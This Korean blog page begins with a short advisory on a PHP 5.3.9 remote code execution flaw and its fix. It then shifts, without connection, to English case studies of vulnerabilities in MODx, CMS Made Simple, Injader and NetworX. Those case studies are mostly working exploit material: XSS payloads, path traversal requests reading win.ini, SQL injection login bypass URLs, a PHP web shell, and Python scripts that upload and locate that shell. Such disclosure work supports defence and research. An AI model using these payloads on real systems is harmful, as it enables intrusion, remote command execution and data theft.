hi.pe.kr 날으는물고기·´″°³о♡

□ 개요
   o PHP 5.3.9 버전의 "php_register_variable_ex()" 함수에서 구현 오류로 인해 원격코드 실행 가능한
      취약점이 발견됨[1]
   o 공격자는 해당 취약점에 영향 받는 시스템에 특수하게 조작된 요청을 전송 할 경우, 영향받는
      시스템에 원격코드를 실행시킬 수 있음
   o 해당 취약점 정보 공개에 따라 피해를 입을 수 있으므로, 웹서버관리자의 적극적인 조치 필요

□ 해당 시스템
   o 영향 받는 시스템
     - PHP 5.3.9 버전

□ 해결방안
   o 취약한 PHP 버전 사용자
     - PHP 5.3.10 이상버전으로 업데이트 수행 [2]

□ 용어정리
   o PHP : 동적인 웹사이트를 위한 서버 측 스크립트 언어

□ 기타 문의사항
   o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

[참고사이트]
[1] http://secunia.com/advisories/47806/
[2] http://www.php.net/

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00

Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()

Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Inection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a

Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
else: print 'shell located at http://' + host + shell_path

upload_shell()

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.